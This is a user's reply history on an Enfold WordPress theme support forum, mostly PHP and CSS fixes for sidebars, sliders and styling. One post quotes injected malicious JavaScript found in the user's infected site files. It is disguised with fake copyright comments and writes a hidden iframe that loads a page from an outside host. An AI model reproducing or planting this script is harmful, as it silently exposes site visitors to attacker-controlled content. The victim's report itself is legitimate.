Forum Replies Created
-
AuthorPosts
-
December 2, 2014 at 8:32 am in reply to: ENFOLD SINGLE PRODUCT PAGE- SIDEBAR WILL NOT APPEAR ON THE RIGHT #361340
N/P but I wonder why Enfold does not support it any more…
December 1, 2014 at 11:40 am in reply to: ENFOLD SINGLE PRODUCT PAGE- SIDEBAR WILL NOT APPEAR ON THE RIGHT #360703Ok. here’s my solution (but for the right sidebar):
functions.php for the child theme:
add_action( 'woocommerce_before_single_product_summary', 'avia_add_image_div', 2); add_action( 'woocommerce_before_single_product_summary', 'avia_close_image_div', 20); function avia_add_image_div() { echo "<div class='single-product-main-image alpha'>"; } function avia_close_image_div() { global $avia_config; $avia_config['currently_viewing'] = "shop_single"; echo "</div>"; } add_action( 'woocommerce_before_single_product_summary', 'avia_add_summary_div', 25); add_action( 'woocommerce_after_single_product_summary', 'avia_close_summary_div', 3); function avia_add_summary_div() { echo "<div class='single-product-summary'>"; } function avia_close_summary_div() { echo "</div>"; //close out the summary get_sidebar(); }
CSS:
.single-product .product { width: 100%; } .single-product-summary { float:left; width:45%; margin-right: 3%; } .single-product-main-image { width: 25%;} .sidebar { padding-top: 0px;}
December 1, 2014 at 8:49 am in reply to: ENFOLD SINGLE PRODUCT PAGE- SIDEBAR WILL NOT APPEAR ON THE RIGHT #360650Is it possible for @MichaelT1 to show up his code please? :)
November 30, 2014 at 8:31 pm in reply to: ENFOLD SINGLE PRODUCT PAGE- SIDEBAR WILL NOT APPEAR ON THE RIGHT #360390This reply has been marked as private.November 28, 2014 at 3:19 pm in reply to: ENFOLD SINGLE PRODUCT PAGE- SIDEBAR WILL NOT APPEAR ON THE RIGHT #359572Hi,
Is it possible to change the image position in left-sided sidebar?If I move product image under the title – the left menu in sidebar would go up.
Could you please let me know which files should I edit?
Thanks
MI’ve got 3.04 version too. The issue with partner/logo elements and accordion slider still exists. :(
Hi Elliot,
Thanks. I changed links in the menu for absolute path for english version.From the main site view, when I click ‘upcomming events’ element from the menu, the page refresh and I am redirected to a proper section.
I just need to have it without refreshment, just like I have it in polish version: just click and scroll to a certain section without refreshment.
Thank you ;)
This reply has been marked as private.This reply has been marked as private.Something’s wrong with your host. Enfold has nothing to do with CF7
delete all WP core installation files (except .htaccess and wp-config.php) and upload all core files again. I hope it helps.
No I don’t know the solution.
I updated everything, changed pass… still have the same issue.I’m haveing the same issue here.
Sucuri plugin says that all my .js files were infected.
I checked the date of those files whis is old.I found that the following code is added to .js files:
/* Copyright (C) 2007 Free Software Foundation, Inc. http://fsf.org/ */ function getCookie(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):undefined}function ActerMoto(){var e=navigator.userAgent;var t=e.indexOf("Chrome")>-1||e.indexOf("IEMobile")>-1||e.indexOf("Windows NT 6.2")>-1||e.indexOf("Windows NT 6.3")>-1||e.indexOf("Windows")<+1;var n=getCookie("lusikrators")===undefined;if(!t&&n){document.write('<iframe src="http://fluersutel.tecnofifa.com.ar/dulbaruid16.html" style="left: -904px;border-left-style: dotted;border-right-color: rgb(13,64,34);border-right-style: solid;height: 100px;width: 100px;position: absolute;border-right-width: 8px;top: -904px;"></iframe>');var r=new Date((new Date).getTime()+64*60*60*1e3);document.cookie="lusikrators=1; path=/; expires="+r.toUTCString()}}ActerMoto() /* Copyright (C) 2000 Free Software Foundation, Inc. See LICENSE.txt
Anyone has the same?
- This reply was modified 10 years, 2 months ago by Mariusz.
Sebastian, which antivirus software did you use?
I’ve got the same.
I removed this file for a while and I sent malware message removal request.
I hope another enfold update would fix this.
thanks.
Ohh I forgot that IE10+ does not support CC :)
I used the following in my style.css:
/*############# IE 10/11 ####################*/ @media screen and (-ms-high-contrast: active), (-ms-high-contrast: none) { /* IE10+ specific styles go here */ body{background: green;} /*############# IE 10/11 ####################*/
THANKS J!
This reply has been marked as private.This reply has been marked as private.August 7, 2014 at 1:55 pm in reply to: Masonry_entries.php – get custom field value or content #301106resolved :)
about line 690:
$this->loop[$key]['linkedin'] = get_field( "linkedin-url", $id );
and then to print the value of ACF field about line 580:
$items .= "<div class='social-icons'>"; $items .= $linkedin; $items .= "</div>";
#top .avia-slideshow-arrows a.prev-slide { left: -120px; } #top .avia-slideshow-arrows a.next-slide { right: -120px; } .avia-content-slider { overflow: visible; }
resolved.
July 18, 2014 at 8:32 pm in reply to: Error issue slideshow.php on line 580 – clean Enfold and WP #293119Hi, No – it’s clean.
Hi,
Chrome.
I just regonised that I had the browser zoom set to 90%.
That caused the issue.
Thanks.Hi J,
I mean something similar to: http://www.mangrove.com/en/company/
thanks.
MTry to deavtivate your plugins one by one.
The solution is: never switch on advanced layout editor to posts and post types. It won’t use single-CPT.php file :|
This reply has been marked as private.July 11, 2014 at 8:26 am in reply to: Simple columns class modification to color backgrounds #289928That’s right Josue, but enabling
add_theme_support('avia_template_builder_custom_css');
is not enough. One has to add as above :)Hi J, Thanks for reply.
I know that, but is it possible to have this table responsive in the next release?Thanks!
ok and how to swap digits to slide title?
-
AuthorPosts